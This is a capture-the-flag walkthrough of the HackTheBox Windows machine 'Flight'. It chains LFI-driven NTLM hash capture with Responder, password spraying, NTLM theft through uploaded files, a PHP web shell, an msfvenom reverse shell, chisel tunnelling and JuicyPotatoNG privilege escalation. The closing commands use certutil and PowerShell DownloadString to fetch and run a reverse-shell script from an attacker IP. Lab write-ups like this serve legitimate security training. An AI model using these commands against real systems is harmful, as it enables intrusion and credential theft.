Flight is a hard windows machine from HackTheBox. The steps to root this box include exploiting local file inclusion (LFI), leaking NTLM hashes, forced authentication (SCF/URL file attacks) and using Juicy Potato NG to get system shell.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-11-07 02:18:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49692/tcp open msrpc Microsoft Windows RPC
57273/tcp open msrpc Microsoft Windows RPC
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_ Message signing enabled and required
| date: 2022-11-07T02:19:00
|_ start_date: N/A
PORT 445/139 (SMB)
We can’t list shares.
PORT 80 (HTTP)
While subdomain enumeration,
school subdomain is found.
Add the subdomain
school.flight.htb in the /etc/hosts file and open it in web browser.
When we open any page, it is passed by view parameter in the GET request.
This gives the idea to try for Local File Inclusion (LFI). We can try to access the index.php file to see if it’s accessible. Doing so, we get the content of index.php file.
Looking at the code, it is blocking the path traversal sequence.
Since, it’s only blocking the backslashes, we can utilize the forward slashes to point it to access file on network share and capture it’s hash by performing LLMNR poisoning. So, first we need to start the responder.
sudo responder -I tun0
Then, point include the your IP address in the view parameter and responder will get a hit.
Cracking the hash we get password for svc_apache user.
Using the found credentials we can enumerate the users using LDAP.
crackmapexec smb -u svc_apache -p 'S@Ss!K@*t13' -d flight.htb --shares 10.10.11.187
Now that we have the list of users, we can spray the found password to see if anyone has this password reused. The S.Moon user has the same password.
crackmapexec smb -u ./users -p 'S@Ss!K@*t13' -d flight.htb 10.10.11.187
Forced Authentication (NTLM Theft)
Since we have the credentials, we can see the SMB shares. Using smbmap, we can see the permissions. The s.moon user has read write access on shared folder. Using this permission we can try to steal user hashes using scf or url file attacks.
So, when trying to upload SCF or URL file, it gives access denied. However we can upload empty files or create folder. This means that files are being blocked.
However, there are many other file/documents which can do the same thing of stealing hash which are mentioned in references. So, i found this tool which creates all files/documents for us in one go.
So, started the responder to listen for hashes and uploaded all these files to try to see if some of them can work. Using this method, successfully got the hash for c.bum user.
# Start reponder
sudo responder -I tun0
# At smb share
Cracking the hash using hashcat, we get the password for c.bum user.
Now again checking we have write access to Web share folder.
First thing, we can get the user flag from Users share.
Now, that we have write access to Web share folder and we know that its using PHP so we can upload a PHP web shell. I will use the following.
GitHub - flozz/p0wny-shell: Single-file PHP shell
p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used to quickly execute commands on a server when…
We can run commands as svc_apache.
Let’s get a proper reverse shell and switch to c.bum user as we have their credentials.
Create a stageless payload binary with msfvenom and upload it on the share same as we uploaded PHP web shell. And start the listener.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.44 LPORT=443 -f exe -o reverse.exe
rlwrap nc -lvnp 443
Executing the binary, we get shell as svc_apache.
Since we have the credentials, we can switch to other users.
For this, the tool that i’ll be using is mentioned in the following guide.
First, download the mentioned powershell script and upload it to target via SMB.
Then, on the reverse shell, start powershell and run script and invoke the function to run reverse.exe as c.bum user.
powershell -ep bypass
Invoke-RunasCs -Username c.bum -Password 'Tikkycoll_431012284' -Domain flight.htb -Command "C:\xampp\htdocs\school.flight.htb\reverse.exe"
Checking for open ports, we can see that port 8000 is open, but we did not see it in our port scan.
Curling the url, we can see that it running another website that we have not seen earlier and it is running on MS IIS webserver. Previous ones were on apache.
Now that we have this information, we can forward this port to further analyze this application. For this i’ll be using chisel.
First download the windows version binary and upload it on target via smb. Then, download the linux version and start listening. Lastly run the following command to forward port 8000.
# On our machine
./chisel_linux server -p 1337 --reverse
# On target
.\chisel client 10.10.14.44:1337 R:8000:127.0.0.1:8000
Opening the website on port 8000, we can see that it’s another website. But, there’s nothing interesting because it’s a static page.
Checking the web-root of IIS, we can see that it is indeed a static site.
But, on checking the permissions on this directory, we can see that c.bum user has write permission in this directory.
Since we have write permissions, we can write an aspx webshell.
Using the binary that we created with msfvenom, we get a proper reverse shell on the system from this service account.
Looking at the privileges, we have SeImpersonate privilege enabled.
To abuse this, we can use JuicyPotatoNG to get a system shell.
certutil -urlcache -f http://10.10.14.44/JuicyPotatoNG.exe JuicyPotatoNG.exe
.\JuicyPotatoNG.exe -t * -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.44/Invoke-PowerShellTcp.ps1')"
- LLMNR Poisoning: https://notchxor.github.io/oscp-notes/4-win-privesc/17-llmnr/
- NTLM Theft: https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds
- Lateral Movement: https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/lateral-movement/runas
- Chisel Guide: https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html
- Abusing Tokens: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens
- Juicy Potato: https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/